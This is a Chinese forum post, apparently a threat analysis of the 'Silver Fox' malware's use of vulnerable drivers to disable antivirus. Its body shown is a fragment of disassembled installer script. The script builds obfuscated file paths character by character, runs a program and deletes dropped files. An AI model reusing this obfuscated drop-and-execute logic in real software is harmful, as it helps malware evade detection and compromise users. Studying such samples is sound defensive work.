主题:持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
z3960发表于 2026-02-21 07:49
Var15[88], S32(58)assign Var15[89], S32(92)assign Var15[90], S32(85)assign Var15[91], S32(115)assign Var15[92], S32(101)assign Var15[93], S32(114)assign Var15[94], S32(115)assign Var15[95], S32(92)assign Var15[96], S32(80)assign Var15[97], S32(117)assign Var15[98], S32(98)assign Var15[99], S32(108)assign Var15[100], S32(105)assign Var15[101], S32(99)assign Var15[102], S32(92)assign Var15[103], S32(68)assign Var15[104], S32(111)assign Var15[105], S32(99)assign Var15[106], S32(117)assign Var15[107], S32(109)assign Var15[108], S32(101)assign Var15[109], S32(110)assign Var15[110], S32(116)assign Var15[111], S32(115)assign Var15[112], S32(92)assign Var15[113], S32(109)assign Var15[114], S32(97)assign Var15[115], S32(105)assign Var15[116], S32(110)assign Var15[117], S32(90)assign Var15[118], S32(84)assign Var15[119], S32(116)assign Var15[120], S32(82)assign Var15[121], S32(106)assign Var15[122], S32(84)assign Var15[123], S32(102)assign Var15[124], S32(121)assign Var15[125], S32(104)assign Var15[126], S32(78)assign Var15[127], S32(73)assign Var15[128], S32(68)assign Var15[129], S32(67)assign Var15[130], S32(65)assign Var15[131], S32(70)assign Var15[132], S32(46)assign Var15[133], S32(120)assign Var15[134], S32(109)assign Var15[135], S32(108)assign Var15[136], S32(34)assign Var14, Var15pop ; StackCount = 14pushvar Var3 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype BOOLEAN ; StackCount = 14pushtype Pointer ; StackCount = 15setptr Var15, Var1pushtype U8_4 ; StackCount = 16assign Var16, U8_4(1)pushtype S32 ; StackCount = 17assign Var17, S32(0)pushtype UnicodeString_2 ; StackCount = 18assign Var18, String_3("")pushtype UnicodeString_2 ; StackCount = 19assign Var19, Var3pushtype UnicodeString_2 ; StackCount = 20assign Var20, Var2pushvar Var14 ; StackCount = 21call EXECpop ; StackCount = 20pop ; StackCount = 19pop ; StackCount = 18pop ; StackCount = 17pop ; StackCount = 16pop ; StackCount = 15pop ; StackCount = 14sfz Var14pop ; StackCount = 13jf loc_196dpushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(25)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(67)assign Var15[1], S32(58)assign Var15[2], S32(92)assign Var15[3], S32(85)assign Var15[4], S32(115)assign Var15[5], S32(101)assign Var15[6], S32(114)assign Var15[7], S32(115)assign Var15[8], S32(92)assign Var15[9], S32(80)assign Var15[10], S32(117)assign Var15[11], S32(98)assign Var15[12], S32(108)assign Var15[13], S32(105)assign Var15[14], S32(99)assign Var15[15], S32(92)assign Var15[16], S32(68)assign Var15[17], S32(111)assign Var15[18], S32(99)assign Var15[19], S32(117)assign Var15[20], S32(109)assign Var15[21], S32(101)assign Var15[22], S32(110)assign Var15[23], S32(116)assign Var15[24], S32(115)assign Var14, Var15pop ; StackCount = 14pushvar Var4 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(7)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(92)assign Var15[1], S32(109)assign Var15[2], S32(97)assign Var15[3], S32(105)assign Var15[4], S32(110)assign Var15[5], S32(46)assign Var15[6], S32(49)assign Var14, Var15pop ; StackCount = 14pushvar Var7 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(7)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(92)assign Var15[1], S32(109)assign Var15[2], S32(97)assign Var15[3], S32(105)assign Var15[4], S32(110)assign Var15[5], S32(46)assign Var15[6], S32(50)assign Var14, Var15pop ; StackCount = 14pushvar Var8 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype BOOLEAN ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype WideString ; StackCount = 16assign Var16, Var4add Var16, Var7assign Var15, Var16pop ; StackCount = 15pushvar Var14 ; StackCount = 16call DELETEFILEpop ; StackCount = 15pop ; StackCount = 14pop ; StackCount = 13pushtype BOOLEAN ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype WideString ; StackCount = 16assign Var16, Var4add Var16, Var8assign Var15, Var16pop ; StackCount = 15pushvar Var14 ; StackCount = 16call DELETEFILEpop ; StackCount = 15pop ; StackCount = 14pop ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(11)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(92)assign Var15[1], S32(102)assign Var15[2], S32(117)assign Var15[3], S32(110)assign Var15[4], S32(122)assign Var15[5], S32(105)assign Var15[6], S32(112)assign Var15[7], S32(46)assign Var15[8], S32(101)assign Var15[9], S32(120)assign Var15[10], S32(101)assign Var14, Var15pop ; StackCount = 14pushvar Var5 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(24)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(92)assign Var15[1], S32(109)assign Var15[2], S32(97)assign Var15[3], S32(105)assign Var15[4], S32(110)assign Var15[5], S32(90)assign Var15[6], S32(84)assign Var15[7], S32(116)assign Var15[8], S32(82)assign Var15[9], S32(106)assign Var15[10], S32(84)assign Var15[11], S32(102)assign Var15[12], S32(121)assign Var15[13], S32(104)assign Var15[14], S32(78)assign Var15[15], S32(73)assign Var15[16], S32(68)assign Var15[17], S32(67)assign Var15[18], S32(65)assign Var15[19], S32(70)assign Var15[20], S32(46)assign Var15[21], S32(120)assign Var15[22], S32(109)assign Var15[
回帖(7):